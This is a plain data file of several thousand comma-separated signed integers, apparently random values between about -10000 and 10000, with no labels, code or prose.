-8695, -3450, 7325, 85, -1728, 5010, 4256, 2607, -4658, 2060, -927, -6976, 3214, 6564, 9284, 3024, 900, -2644, -874, 4318, 7622, -2623, -1426, -6074, 8294, -3986, -2914, 7753, 4737, -2478, -786, 7980, -9230, 3400, -9920, -759, 8058, 246, 437, -4812, -2885, -8218, -4786, -7828, -8665, 9821, -4247, 4283, -2205, 6371, 2315, 7116, -454, 6784, 2777, 8890, 8459, 8155, 725, 777, -8088, 1437, -5434, -3115, -8566, -891, -1654, -6168, 9589, -7939, -7748, 8647, -694, -4824, -1291, -4235, -1338, 3030, -3429, 9486, -25, -5147, 2814, 9259, 8765, 3029, 5380, -6268, -6878, -967, -1174, 319, 9548, -634, -1840, -4334, 4751, -3335, -5208, 638, 8224, -5889, 5152, 
-2366, 6037, -1066, -4975, 8739, 4008, 7824, 3954, -7877, -8843, 9708, 3499, -5265, -3039, 1240, -6634, -625, 2702, 9030, -3655, -9490, 5672, -352, 4609, 4356, 1731, 8429, -2424, 9220, 1151, 4066, 6619, -7982, -3933, 294, 7907, -1409, -6071, 5547, -255, 5029, -7486, -8510, -8851, -7929, 7281, -207, 1495, 366, -144, -1001, 4478, 6102, 1412, -2898, -2606, -6206, 2920, 7299, -2457, -9020, -7589, 7699, 3010, 6810, 7656, 6084, 9279, -3465, -8003, 4610, 2807, -2634, 7292, 6429, -7095, 6066, 3159, 1721, -5444, -145, -882, -2885, -9185, 9008, 620, 9239, -1186, -567, -918, -1701, 3757, 8098, 1357, 5820, -2758, -4380, 6664, 6713, -8692, -2601, -4051, 7138, 5088, -9675, -3855, -3009, 7911, 5574, 1560, -4121, 3269, 5266, 3426, -6081, -1652, -7358, 2256, -3427, -5878, -3924, 2937, -9046, -7598, -9827, -9663, -8404, 2784, 3888, -610, 905, 7876, -373, -8477, 8437, -7928, 1564, 9288, 1807, 5044, 9669, -401, 272, -6746, 626, 1971, 4241, 7787, -8591, -8955, 7588, 4012, -8150, 9363, -6599, 9564, 7694, -1627, 1288, 9129, -1191, -8963, -1718, 7460, -5561, 2449, -5504, -4461, 5187, -4088, 4001, 7739, 1299, 2651, 9696, -3710, -3549, -2138, -2675, -4004, 5411, 3864, -2566, -9291, -2027, -5138, 2970, -2812, 1497, 3242, 8503, -5509, -4424, -8518, -9314, -4412, -8000, 4395, 1387, -2608, -9404, -9096, 6605, -4413, 8549, 7, 4192, -527, 8057, -9034, -4355, 7956, -5023, 6919, 7367, 7737, -4815, -9964, -5717, -4719, 7770, -2610, -5969, 9258, 4089, -3529, -2766, -190, 3289, 1234, -5751, -8941, -3098, 2584, 1663, -5666, -2675, 7781, -9900, -1863, 1727, 6952, 2137, 3451, -3909, 259, 350, 6907, 6442, 3051, 8895, -9687, -4702, 8234, -6741, -5075, 1858, -7043, -7882, -2434, 5137, 4036, 9150, 6638, -3072, 7424, 3318, -3980, -9749, 5917, -4504, -4461, 3984, -8983, 6374, -3966, -6375, 4745, 843, 7901, 2825, 5987, -8364, 7899, -6368, 180, -4068, 1500, 7444, -4644, 4731, -5273, 3498, 8269, 643, -7033, 5360, -5054, -9014, 1313, 7885, 1448, -49, 6594, -3442, -4720, -2181, -6717, 1378, 8827, 5888, -8562, 
-9778, 9421, 5126, 6110, -58, -6024, 6442, -9477, -7224, -2481, -6362, -9408, 9917, -8945, -992, 4457, -1148, 4830, -1110, -7839, 2098, -5261, 3549, -8518, -9555, -3083, 2000, 8815, -292, -5987, 655, -7360, 7671, 645, -8999, -2520, -7052, -3248, -7012, 1957, 8945, -6642, -7345, -8624, -8568, -1462, -6057, 6725, 9096, -5468, 1824, 2962, 1738, 4619, -1889, 3567, -155, 4623, 1238, -7897, -4356, 9699, 1602, 5414, -2394, -6177, 5652, -637, -1645, -747, -7941, 5994, -6389, -644, -478, 8994, 9650, -123, -9940, 7874, 4177, -3178, 4001, -9822, -8294, 440, -4747, 1762, -8029, -2566, 5717, -8218, 6052, -5718, -5061, 5019, 1541, -9317, -9392, -5829, 6118, 2667, 5113, 8223, -6261, -942, -4486, -8333, -7957, 4260, 1786, 4341, -971, 1912, 1840, 2190, 954, 2573, -1681, -1770, 3492, 5185, -4394, 5479, 716, 4412, 7870, 2262, 9593, 4831, -1956, 7558, 7756, 4552, -9911, 900, 8054, -2042, -166, -1248, 2712, -8324, -9749, -1068, 4483, 5120, 1969, 4497, -9528, -536, -4279, -1122, 8989, 3259, -591, -4866, 6880, -7897, 181, 1325, -8423, 876, 4349, 2208, -3045, -2551, -2298, -3799, 1936, 3092, 4812, 6186, -6627, 2046, -5131, -8042, 5631, 3535, 6381, -4253, 3481, 7519, 972, 7013, -5740, -8068, 2879, -217, -1417, 9387, 9966, 8080, 3158, 6203, 6240, -2713, 1884, -5939, -4887, -6618, 7425, -8497, 4287, -6589, -4300, 1035, -3693, 7126, 9102, -5614, -6425, 4476, 4662, -325, 3970, -3664, -2163, 6273, 3889, 8480, -6845, 7425, -3098, 6383, -1288, -6481, 9873, 8866, -591, 5380, 9193, 9553, 8092, 1183, 1457, -3960, 4253, 1943, 4415, -8323, 8303, 4307, -2137, -8408, -1753, -208, 9669, 9167, 2623, -1142, 7395, -7398, -5218, -3102, 5735, 3623, 6257, 4699, 426, -5895, 8313, 3859, 3961, -7965, -6928, -1932, 3451, -3362, -1369, -489, 1304, -1343, 4707, 7193, -7753, 3547, -1451, -3487, 6616, 8042, -912, -6465, -3125, 8710, -8028, 9719, 5693, 2720, -7706, 9292, 8804, -3015, 1413, -9497, -5327, 5406, -1449, 6340, -1689, 1891, 8171, 8015, 540, 1191, 819, -5744, 9290, -5247, 7400, 6063, -5408, -5324, 8986, 6735, 
-8343, -6501, 7963, -8668, 3331, -2616, -7172, -8196, -3019, 714, 572, -4689, -2472, 4206, -3645, -1107, -7949, 3429, -64, 3739, -8236, -5070, -5133, -6350, 2155, -5517, 6685, 987, -5310, 9282, 284, -9210, -1091, -1347, -5184, -8684, 9773, -6810, 7466, -3282, 4001, 9450, 5968, -1599, -516, 2176, -2029, 6823, 3910, -2173, -1042, -5468, 1710, -3974, -4011, 7759, -3485, -266, 3886, 4835, 2717, -5427, -1232, -3525, 342, -7966, -9842, 7548, -2890, -5707, 2010, -6778, 1642, 1991, -4051, 8570, -3623, 7138, 3435, -8848, -2358, 6650, 9115, -4508, 2882, 8469, -8121, -290, -8855, 6625, 3954, -5537, -2802, -8393, -2011, -8629, -3461, -8266, 8927, -4676, 7658, 7795, 6854, -3796, -1128, -2940, 8329, 1562, -9829, 9086, 4208, -7139, -2379, 2266, 7983, -4268, -5394, 6151, -5413, 1749, -4346, -2068, 8863, 8991, -5901, -1389, 2680, -1648, 3014, 3005, -1224, 953, 5001, -9863, 6064, -3488, -1015, 5229, -1976, 4307, -9949, 4464, -2058, 6839, -6000, -9476, -449, -6840, -7549, 212, -4991, 5621, -269, -3404, -688, 5052, -701, -6309, -6035, -7136, -5859, 658, -8622, 3150, -5887, -3341, 4979, -6343, 7684, 8373, -4214, -6412, -7742, -9240, -9574, 1978, 707, 2173, -726, 9488, 7282, -8101, -5990, 2744, -2166, -4437, -7672, -8960, 8424, 1895, -1712, 7218, -31, 2070, 268, -9313, 9254, 1536, -7259, -4871, 8532, 625, -9806, 832, 2738, -1064, 1621, -6821, 1162, 5196, -7886, -2875, -7165, 9121, 8738, 9273, -9357, 8578, -7485, 9783, 5134, 5681, -9362, -1788, -1010, -9032, -7000, 7273, -6594, -5104, 6975, 8398, 9303, 17, 4784, 4368, -8066, -231, 8454, 4459, 142, 8281, 2416, -6821, -5765, 6961, 798, -6964, 4583, 1212, -8565, 6044, 1254, 7569, -1314, 2365, 8617, -821, -8077, 9027, -6976, -4598, 2315, -1985, 6930, -4988, 7108, -3738, -6063, 8643, 3997, -1938, -3852, -6372, -4838, -2186, 646, -6950, 1343, -8956, 4150, -1797, -999, 7756, 667, -2909, 3841, 5974, -7829, 8300, 9059, 4856, -9329, 2725, -6398, 592, 8626, 8015, -5452, -8763, -6950, -5261, 1026, -1090, -7322, 8404, -9986, -6293, 499, 4069, 3090, 
-3037, -8770, -6825, 9664, 4513, 5008, 9538, -3974, -4635, -1235, -6668, 6424, 4817, -6921, -632, 5903, -1202, 9447, 6555, 1006, 315, 1229, 2841, 1791, 6087, -8396, -6947, 5292, -2054, 4359, 6928, -1151, 9659, -1885, -9051, 693, 7096, -8828, -1247, 8082, 9121, -5199, -379, 9221, -7421, 2702, -8896, 6960, 3983, -3663, 7781, -6269, 8457, -3886, -8442, -7337, 1374, -9757, -5783, -1582, 2666, 303, 9149, 7007, 1801, -4234, -6475, 9788, 8197, 5852, -5381, -1938, 162, -4498, -7576, 3635, -5060, 1318, -9987, 4851, -9213, -3527, 9675, -9114, 3952, 3005, -3368, -2894, -1727, 2931, -8596, 3411, -8116, 1618, -9551, -2092, -7773, -5227, 4829, 5407, -2092, 4493, 8041, 5447, 6145, 6778, -8015, -6580, 1302, 7082, 9446, 5272, 9414, -4988, -7080, 6243, 389, 2622, -4269, 5047, 9541, -7364, 9898, 400, -7582, 2624, 7635, 3339, -9157, 3714, 1542, 9407, 7846, 5021, -4117, 6848, 3696, -2129, 8582, 27, 3283, -2518, 9032, 3865, 1070, 6739, 5894, -510, 6837, -1961, 5959, 8528, -8532, 7371, 7206, -4193, 6089, 2571, 8264, 5922, 6226, 825, 9933, 6657, -8439, 1284, -8081, 9052, -1988, -3904, 6265, -5186, -6293, 7910, -5741, 266, 8018, -7278, 1117, -7046, -4225, 8945, -2693, 433, 3911, -286, -6454, 4515, -7361, -223, -1379, -1022, -5100, 7547, -8948, 5632, 7408, -966, -7053, 7052, 7990, -9693, 2128, -1692, -1710, 1773, 5063, -2383, 4676, 2627, -485, 9771, -7038, -132, 2135, -3698, 8935, 3959, -2660, -2442, -6636, -4812, -6760, 6749, 9977, -2227, 8248, 8766, -4758, -1450, -7476, -3378, 8572, 1724, -8006, -6945, 9863, -8598, -6454, 9125, 648, -5537, 6198, 3882, -8907, -6064, 2839, 3873, 3545, 5250, 2652, 8986, 8573, -1144, 1981, 3170, 1305, 5974, -5371, -2516, 6464, 8854, -4784, -1330, 2323, 3776, 9387, 831, 2017, -9055, 4658, 5368, 273, -1095, 9609, 339, 4140, -5165, 3845, 4652, -8841, 542, -1619, 2391, -6454, 1274, 9266, 5428, 7742, 3515, 1641, -2402, 9694, -7805, -4629, 5564, 9288, -5320, -1136, -8638, -4198, 3560, 3077, -2524, 497, -3183, 5655, 1382, -2856, 6350, -5202, 4858, 4536, 4488, 6476, 
9373, -6352, -2569, -5016, -7294, -4269, -1172, -5579, -8092, -8612, -9298, -7406, -7737, 1101, -5802, 872, 3352, 8483, -5717, -234, 4079, -5092, -4840, -2871, -1430, 587, 689, -1509, -194, -48, 7861, 1359, -1541, 876, 9977, 7288, 4853, -4908, 960, 6197, 4124, 895, 9415, 9986, -1002, -8480, -2799, 7171, 884, 7435, -1077, -478, -7760, 3278, 8092, 2578, 9992, 2184, -7099, 4297, 5467, -2908, 6002, -6854, -3306, 5007, 3201, 4353, -4448, 200, -4266, -2913, -8840, -2769, -7860, 8551, -4450, 5978, -1793, -6041, -5503, -1644, 6584, -3438, 7687, 8284, -592, 5026, 1539, 2799, 6183, 8271, -4183, -7664, -3253, -5705, -4775, -7054, 2970, -4343, 8900, -8404, -4846, -4256, -3840, 9449, -6117, -6709, -5883, -7244, -6783, 8317, -1757, 6623, -5893, 2380, -547, 9986, 9371, -4692, -5977, -9717, 4671, -7027, -8988, -8347, -236, 3091, -5461, 1481, -4789, -520, 3418, -3579, -3582, 960, -1756, 3843, -6093, -2919, 3154, 4359, -6820, 9665, -4946, 6490, -6879, -4453, 2159, 2522, -4859, 2780, -6757, -7617, 1560, 3216, 8149, 5982, 4586, -2420, 9200, -5540, -7188, 3101, 7293, 4594, -5126, 3748, -8850, 2463, 2473, -4386, -2198, 6395, 1165, -3546, -9834, -4239, 4027, 9320, -8808, 677, -2793, -872, -6880, -6873, -5458, 6745, 2951, 5045, -8141, 1200, -6061, 2508, 4412, -4275, 4987, 3766, -2970, -1261, 4472, 1399, 9531, -6428, 3294, -252, 3360, -4856, -3443, -9394, 6443, -9144, 331, -3486, 503, 287, -3338, 5288, 5649, 2102, -8751, -6940, 2672, 9093, 8611, 6851, -2954, -7094, -8977, -3550, -2333, -956, -7677, 461, 5572, -9697, 2042, 827, -3373, -8958, -2699, -7100, -1685, -7803, 7973, 216, 321, -8233, 893, 1177, 7539, -1288, -585, 1224, 8696, -4727, -6374, -5393, 6749, 8741, 9497, -8832, 8880, 7688, -3053, -9335, 6568, -5173, -2956, 8496, 4903, -5962, -7137, 7778, 9850, 5319, 8469, 2228, 2929, 5551, -5376, -3763, -3224, 1232, 5644, -3547, -9409, -4785, -7431, -7030, 4246, -9592, -6562, 3012, -5331, -3943, -4204, -7624, -3000, 5833, 469, 5997, 3231, 3184, 3212, 1453, -2987, 7802, 2189, -2224, 2177, 
-9055, 6113, 1935, -548, 6169, 3711, -2188, -2768, -7444, -245, 120, -5454, 7992, -1818, -5357, 4902, -6718, 7035, 9638, -4541, -4928, -9335, 6346, 5561, -5728, -6315, 7555, 4544, -8558, -3950, 2322, 9303, 1468, -3552, -3829, 1731, 315, -743, -9482, 2126, -6156, -5302, 445, -2248, -7015, -1668, 3598, 7847, 5277, 4902, 6622, -6512, -2931, -9392, -5299, 9555, 6458, -8529, 3907, -7188, -51, 9860, 4110, 3147, 1388, -5982, -5333, 9545, 2799, -5479, -412, -2247, 9441, 3580, -2202, 3289, 8076, 245, -4593, -2094, 1859, 4782, -1211, -8660, 9447, -8184, -7098, -6090, -496, 6419, -6730, 2695, -2981, 754, -9543, 2528, 1635, -8704, 9195, 1440, -8137, -9631, -76, 1545, -6563, 726, -2454, 67, 9461, -6768, 5020, -1600, 7568, 6397, 988, -9910, 7449, 5175, -7419, 6832, 5278, -2028, -2634, -9863, -9025, -6799, 6754, 8406, 7386, -1379, -9127, 589, -5011, 3857, -7904, -4008, 3022, 2909, -5553, -1117, 5837, -7037, -4636, 2559, -6822, 8276, 8686, 5903, -6049, 176, 742, 5560, 318, 1465, -2639, -4883, 8446, -4558, 3635, 9355, -4826, 1756, 5555, 1297, 8532, 3686, 2208, 9725, 5420, 2090, 8150, -343, -8349, 3222, -3430, 8208, -9304, 319, 6241, 1520, -8635, 6771, 1739, 8196, -8, 4673, 1822, -8946, -4926, -3551, -2280, -6263, -2144, -6231, -6809, 1630, -4436, -5388, 5799, -4009, 5118, 8259, 4533, 3168, 1590, -1556, 6060, 5437, 8279, 9400, 2084, 8745, 4154, -1366, -8170, -5482, 3599, -334, -9228, 3821, -9563, 3660, -1015, -7434, -6919, -5040, 7236, -1407, -4867, 7691, 5105, -8472, -4820, 3837, -4776, 4953, -4167, -7524, 8374, -1360, 5662, 8233, -5597, 7680, -8792, -1741, -2229, -4682, 3609, 6316, 7805, -9437, -3845, -5167, -1152, -3326, 8349, 6514, 2366, 664, -1503, 2805, -2314, 9449, -8021, -5293, -8144, 5037, 694, 1981, 2371, 2966, 2517, 9076, -3090, -9310, -9287, 1395, -9174, -5373, -6835, 3172, -8348, -4090, 9834, 3954, -7060, 75, -2614, -8149, 963, -5262, -5715, 2552, -9172, -1412, -1520, 2340, 1415, -2963, 8239, -1618, 6237, -303, -3272, -217, -1013, -80, 3657, -9609, -4029, 4710, -6750, 
1887, 6710, -5610, 2436, 3683, 3488, -3242, 219, 6275, -1556, -5102, -6167, 3449, 1232, -4083, -1163, -7236, -8961, -4843, -1984, -469, 6736, -4225, 3013, 8931, -118, -9457, 3468, -1285, 4060, -1795, 4767, 6299, -1800, 6312, -1062, -5610, 9041, -2374, -970, -5905, -8651, 6035, -5605, 9815, 1494, -2622, -9743, 2125, -5570, 5892, -8553, -6015, -9135, -6001, 1678, 836, -5870, 6678, 4288, -2008, 8933, -5945, -8465, -5851, -7554, 4960, 8183, -425, 376, 9571, -6471, 2954, 1767, -7184, 7568, -2199, 8745, 6520, 4865, -1529, -4410, -2126, -9067, 9716, -7159, -1053, 3234, -9126, -1040, 6105, -471, 2536, -5765, -1457, 2882, 8914, -4096, 6157, 2180, 8081, -250, 743, -4485, -5841, 8137, -5703, 3510, 2135, -4178, -5655, -7812, -6517, -3252, -5933, -7060, -1827, -2970, -7573, -3473, -3025, -1386, -8708, -3253, -3140, -817, -3821, 8950, 7832, -2251, 7328, 1328, 2982, -6895, -20, 7145, 7486, 5887, -9196, -6225, 1664, 468, 2895, 3090, 673, -7948, -4733, 6372, -5298, -5379, -2381, 2312, -3016, -7735, 1006, -2165, 1868, -3205, 8257, 4673, 2109, -886, -8001, 3571, -4106, -8060, -7480, 5560, 9356, 4555, 989, -4102, -4679, 3252, 1681, 818, 9852, -1934, -9839, 6471, -3974, 1266, 2519, 2511, 7042, -5323, -7401, -9040, -6320, -963, 9059, -2008, -1419, -9973, 4268, -201, -5797, 2031, -2850, -5306, -8582, 6717, -7721, 2093, -3532, -3314, -9635, 9766, 1032, 9459, 7225, -9162, -1041, -9268, -8740, 3038, 9588, -4065, -2794, -4189, -8930, -9353, -8969, 8452, -2571, -2054, -3516, -9926, -1086, 9783, -377, -9646, 1540, 6622, -8250, 1510, 3845, 1221, 9195, -2929, -2836, 3416, -6995, 7227, 657, -7639, -209, -3202, -4531, -6520, -8971, 8857, 2514, 1218, -8920, 1172, 4833, 6434, 1023, -1730, 9429, 7898, 425, 9271, 125, 8028, -7699, -7335, -99, -7801, -3119, 9724, 4155, -7830, 4620, 9318, -2566, 1242, -4859, -522, -9801, 2255, -4469, -205, -116, 9716, 6345, -4590, -9929, -5106, -1331, -6727, -5636, -9716, 5277, -2580, 4069, 9305, -2583, 386, 4446, 7224, -9436, 9906, 9790, 6818, -2471, -5851, 4680, 5099, 
6312, 4293, 7597, 5546, -2356, -5349, 2722, -5384, -5353, -1076, -8872, -1868, -9313, 1934, 5107, -1765, 7746, -7032, -2499, 332, 3353, -8095, -6353, 969, 5163, -9319, 6350, 2335, 3727, 65, -8445, -1875, -8920, 4879, 1335, 693, 2489, 2880, -4024, -6278, 3541, -7519, 5864, 982, 2034, -2930, -5907, -9866, 3691, 3909, -9983, -5356, 6213, 4475, -201, 9410, 4549, -1100, 6627, -1432, -8677, -5746, 2635, -1531, -7413, 6536, -8846, 7057, 1322, 3628, 5455, -2704, 9645, 3374, -8595, -1522, 9955, -7649, -566, -530, -3078, -922, 646, -6672, -8824, 6879, -3141, -5617, 8424, -8783, 2613, -5388, -8367, -4130, 3620, 8919, -6018, 9864, 1667, 2466, -5527, -5221, -3494, 2789, -3816, 7529, -7422, 9064, -4507, -7836, -466, 5703, 8924, -1811, 8253, 85, -8443, 5393, -4341, -656, 971, -3319, 2886, 9851, -3438, 742, -8615, -8194, -3307, 1302, -8640, -6711, -631, 9479, -4123, 7585, -4052, -1344, -8027, -9007, -181, -6821, 7430, 1452, -5726, -269, 4817, -2372, 2166, 5881, -5550, -7492, -8460, -8963, -5238, -3609, 9095, 9641, -7742, 6076, 9570, -1835, 5068, -385, -1891, 476, -4316, -3657, 1833, -2026, -7976, 5446, -7473, 9406, -1103, 2483, 589, 9034, -2397, -9808, 8660, -4155, 7372, -3708, 3951, -5683, 7397, -2814, 5350, -7289, 5548, -2252, -3348, -9427, 4908, 3780, -3267, 2402, 4872, -5326, -1305, 3990, -990, 48, 8635, 836, 950, -2899, 371, -2852, 8141, 3504, -6922, -12, 5320, -7102, 6759, 1140, 1868, -5559, 2848, -4170, -8330, -1986, 8234, -6731, -3089, 1426, 1714, -5615, 4749, -3165, -5956, 3949, 6704, -2944, 3705, 9054, -5378, -77, 5593, -8945, 537, -6242, 5759, -456, 1257, 1972, 4023, -7476, 9171, 7921, -252, 1204, 8132, -7405, 7402, -1450, -4322, -1390, 506, 4321, -4403, -4691, 9847, -5031, 734, 8694, -3125, -7039, 8633, -5153, 4250, -5422, -3046, 5395, 9295, -1950, -3885, 7546, 8647, 4699, 9042, -3982, -6045, -5824, 4358, -484, 2715, -2317, 6301, -2873, -1825, 1783, 1442, 6523, -1452, 3441, -8, 9334, -4297, 749, 9913, 1721, 2330, -425, -9638, -8436, 2310, -8307, 2399, -1283, -6646, 
-7217, 4190, 805, -912, 9159, 6419, 1162, 8627, -414, -2997, -5364, -1457, 6972, -5322, -8817, 6403, 8925, -4499, -8820, -243, 7644, 2452, 4485, -1501, -7565, 9364, 5486, -5582, 3787, 50, 5344, -7117, 6532, -697, 8709, 7677, -6196, 9082, 2297, -7843, 3733, 7402, -5269, 6283, 369, 2516, 4834, 6323, 7467, 2611, -3666, 8107, -4484, 3814, -7011, 2843, 1561, -9467, -1423, -6159, 3841, 5081, -9246, 3737, 1794, 897, 486, -3138, -7166, -8162, -7632, 2454, 2751, -6291, 376, 1601, -6011, 7580, 667, 2504, -9250, -1370, -9726, -9329, 4644, -9445, 1401, 5626, -2758, 5184, -8756, -3698, -2080, 9860, -1155, 6887, 4524, -7158, -539, -3725, -8044, -3250, -1253, 3792, -9949, -7997, -5985, 5417, 6528, -2239, -3554, 3610, 5294, -7176, -6469, 9288, 864, 9640, -6987, 2475, -8477, 8658, 942, -7901, 965, 4101, -925, -4287, -5758, 8, 4770, 7334, 6724, -5683, 1019, -2925, 3972, -8251, 6512, 9579, 7240, 4083, -4698, 6377, 9950, 7052, 2045, 5564, -9748, 5418, -862, -6589, -8289, -2342, -1155, 9675, -1644, 1404, 8368, -6678, 848, -6435, -8297, -6877, -1244, 6854, 8120, -611, -4552, 4228, -8655, -4186, 5090, 7658, 9096, 6555, 1613, -6768, 2823, 1520, -2807, 6365, -5288, 7481, -1168, -6766, 4449, 3231, -2774, 1090, 7848, -1147, -8497, -812, -5831, 9391, -1827, -61, -8225, 4815, -6524, 2627, 8985, -257, 8207, 8267, -5287, -3488, -4448, 4521, -5068, 7851, 3189, -4509, 2389, -9467, 1413, -7069, 1034, -2584, 9796, -3075, -3968, -1172, -9655, -633, -6717, 2239, -2972, -4698, -8670, -7744, 1029, 9890, -4070, -5933, -6152, -9991, -3482, 9938, 8717, 8657, 3235, -1757, 5773, 3642, -8216, -2059, 3323, 9886, -4365, -8670, -6240, -6619, -7161, -8637, 5863, 5128, 6575, 2750, 3790, 9784, -453, 7597, -1290, -902, 9695, 6074, -6069, 2803, 7852, -1283, -6651, 9740, 4071, 1681, -7204, -7834, -7908, -147, -6440, -2039, 6685, 645, -4956, -5226, 4444, 2525, -7124, -1047, 7860, -4728, -1262, -7596, 8976, -798, 9799, -1557, -3071, 7841, -6605, -367, -7107, -839, -2766, 9939, -6163, 113, -5063, -7327, 9190, -8219, 
-2024, 2364, -7701, 2857, 4080, 6894, -7798, -3067, -7008, 2738, 697, -1087, 4315, 3129, 6261, -1095, 6800, 5731, 3053, 2436, 8468, 9307, 2639, -7926, 7859, 9950, -458, 2479, -4440, 7569, 4554, 3013, -4579, 5616, 766, 5248, 1815, -1942, -3774, 6555, -5831, 5821, 2452, -7110, -5216, -3660, 4645, -4617, -271, 2747, 4799, -792, 2112, -7278, -3873, -8825, 4172, 9588, -6632, 7764, 9191, 6210, 5880, -1832, -6975, 5459, 8412, 2214, 2106, -6578, 9973, 5707, 794, -4850, 7043, -5825, -1367, 9911, -4831, 8118, -9983, 5723, 5112, 1504, 793, -2500, -7201, 4721, 9497, 6618, 9081, -5115, -9456, 7448, -9527, -3933, -202, -774, -9971, 4652, 1224, -3140, 2800, 8352, 6746, 5267, 8028, 6189, 9552, 1940, 6926, -4112, -7554, -8911, -5455, -3233, 7594, 4365, -457, 7466, -691, 6857, 4800, 1960, -4378, -1964, -6187, 4901, 8414, 4412, -3492, -5080, 1227, 250, 2836, -9018, -1998, -4363, 4145, -4790, 4245, 1842, 9648, 2224, 5837, 3346, -7870, 2269, 895, 9194, 9062, 9249, 990, -7443, -5488, 3616, 7546, 234, -165, 9333, -200, 8, -5779, -18, -3903, -2767, 9490, -8420, -789, 8387, 7159, 8867, 6541, -6680, 2768, -7315, 7242, -947, 7159, 5172, -487, -9189, 9860, -7630, -3351, -2058, 1245, 930, -724, -2618, 5251, -9326, 8904, -6510, -6121, -9001, -3728, 2289, -1600, 2438, 7532, 4906, 1202, -6672, -5711, -9728, -2671, -9412, 8096, 232, -2999, 285, 4079, -5090, -3817, -7482, -3219, 4606, -70, 6723, 1744, -289, 6839, -9065, -1073, -1344, 3043, -9530, 3808, -723, 1721, -3884, 8614, -8069, -663, 1820, -5481, -5491, 1475, -6839, -7100, -1651, 4063, 2477, 7821, -9299, 4007, -9506, 890, -8599, 263, 2276, -7894, 4607, 3596, -6072, 1441, 6130, 9647, 990, -2893, 2974, 2927, 1869, -9505, 3265, -9281, 8723, -9093, 8761, 1193, -4654, 1803, 3614, -3834, 9278, -6137, -4139, 3862, 5198, 1288, -6098, 962, 4656, 1763, -3701, 9420, -2779, 4358, -8380, -8208, -9399, 4175, -2728, 6917, -9243, -6475, 9206, 4578, -6561, 6243, -7793, -8380, -9590, 1728, -4544, -7230, -2913, -8999, 730, 557, 1050, -1400, -3273, -4223, -4988, 
6965, -6490, -1756, 7057, 8619, 8432, 4339, 5695, -4270, -5492, 6136, 8017, 9513, 1603, 9303, 1571, -4999, -3803, -9258, -6330, -9336, -4377, 2593, -4356, 2758, -9508, -3269, 6656, 9150, 490, 3988, 8136, 1552, 9511, -2379, 8758, 6221, 8871, 8570, -1897, -6649, -1863, -5365, -6387, -9863, 8372, -610, -6963, -1832, 2986, 8252, 1381, -2250, -5265, 386, 7754, -1397, 7849, 317, -8933, -4601, -3087, -4451, -5178, 9537, -3681, -4291, 450, 1196, 4966, 6019, -2294, 1860, -9938, 1333, 6814, -7642, -8684, 5494, -4517, 8943, 9724, 7776, 5401, -8082, -2355, 1669, 5208, -663, 5411, -4728, 2996, 6305, 9555, -3649, -3116, -8426, 2095, 6661, -3890, 3259, 8846, 3981, -3790, 8555, -634, 3111, -1724, 4117, 7803, -100, -8451, -3961, 5648, -8731, -2658, -5747, 3509, -4969, 4938, 3354, 8139, -2356, -7226, 1255, -1818, -6126, -3892, -1135, -2947, -313, -9264, 6019, -2088, 1916, 7279, -7309, -8442, -1319, 8221, -4447, 9922, 4826, 521, -9991, 8666, -5227, -1229, -4311, -9859, 2950, 3700, -314, -7978, 7408, 4441, 6101, -2711, -5420, 724, 2161, -8883, -558, -5684, -7633, 5977, 2383, -9525, 2490, -7894, -9904, -9570, 914, 2642, 5947, -7857, -2769, 8966, -4392, 3363, 6379, 3519, 6587, -6585, 6852, 4403, 9015, 7022, 2096, 8292, -1269, 4314, -3376, 1815, 7261, -1783, 3622, -8324, 1197, -3877, 8942, -7325, -7422, 4714, 4625, 1385, 939, 5335, 9014, -5779, 7123, -2780, 1326, -1053, 8050, 2418, 7445, 18, 4636, 9457, 1032, -108, 2450, 637, -9971, -2656, -8014, -6765, 8183, 8786, -6135, 9966, 3582, 1502, -4887, 9576, -1754, 5251, -5965, 1152, -6458, 9177, 376, -5416, 6046, 2523, 616, 23, 2730, -1184, 6240, -3406, -4711, -5396, -2244, 2313, 4117, 2131, 7198, 3309, 3084, -74, 4993, -5905, 9194, 5514, -7955, -6711, -5828, 4626, 4833, -4990, -7389, -3736, -7922, 8032, 8234, -4529, 3256, 7870, -6749, -556, -3573, 6348, 1337, 1699, 9892, -9355, 9636, 14, -9281, -9136, 586, 2083, -123, -6685, 2893, 4594, -2614, -5435, -2654, -6686, -2097, -9586, -2778, -7899, 5831, 7360, 3091, 1772, 1787, -8095, 8690, -4644, 
-5979, 3900, 5059, -4616, 5010, -6287, 7656, -5416, 4413, -8792, -7594, -3282, 3109, 1278, 1501, 7558, -9180, 4974, -9938, 408, -2728, 9335, -2145, 6438, 3382, -8932, -9117, 1160, -1551, -8377, 9343, 4443, -703, -7900, -5353, -9211, 986, -5618, -6412, -6820, -737, 7393, 2787, -2528, 6629, 8035, 2856, 1420, -2346, 1682, 6179, -4062, -2666, -382, -6659, -1951, 3668, 309, 9309, 2739, 4142, 366, -5812, -6374, -1879, 9267, 3574, -4577, -4549, 3420, -1719, 6373, -2304, -1910, -5546, 8493, -6769, -3511, 1657, -2778, -5381, 3589, 971, 2922, 9754, 5876, -5963, 3911, 7302, -17, 7199, -509, -5187, 7536, 8563, -9478, -8641, 8036, 3562, -9506, 1923, 2732, -8999, 1153, 4343, -4108, 1737, -54, 7404, -8161, -3227, -7307, -1793, -8922, 2965, 4719, -4366, 1544, -7532, -3404, 7087, 9059, -1834, -8242, 4270, -3723, -7763, -9866, 9247, -3793, 3201, -8314, -5315, -1232, 4862, 7011, -4190, 7197, 98, -1845, 4971, 1965, 5206, -1495, -2247, -8741, -8655, 9370, -7385, 5539, 4304, 3484, -4943, -4689, -6505, 3569, -4477, -5431, -8450, 1862, 4576, -3734, 2614, 7067, 5017, 4419, -6970, 4886, -2828, -7618, 3642, -6640, -4602, -9892, 4716, -2490, 6062, 7165, 2261, 1360, -2705, 3865, -9653, -3378, -5458, -1211, 1697, -4972, -4264, -1605, -1936, -1232, -4925, 7422, -7566, -5539, -8619, 9934, -4688, -7009, -4942, -6377, 2105, 2984, 2161, -2149, 7395, 2614, 3780, 369, -6084, 5454, 8366, 5320, -9112, -7818, -2443, 7006, -1995, 5312, -307, -8407, -5864, 8706, 1520, 5842, 9254, -490, 995, -8594, -7369, -7226, -4566, 9350, -2329, -1431, 1826, -1077, 6437, -6828, 9657, 7568, -588, 5678, 2472, 2176, -6804, -4210, 425, -6476, -3881, 6647, -7328, 6170, -9363, -3616, 5007, 9565, 2538, -9850, -6744, 1204, 2659, -8092, 4040, -8124, 6381, -3109, 8395, 7467, -6513, -5550, 3893, 6596, 26, 4904, -4541, -2207, -3354, 6670, 9665, 8214, -7154, 4497, -7869, 1780, -7556, -365, -6204, -1963, -4377, -1525, -2826, -1360, 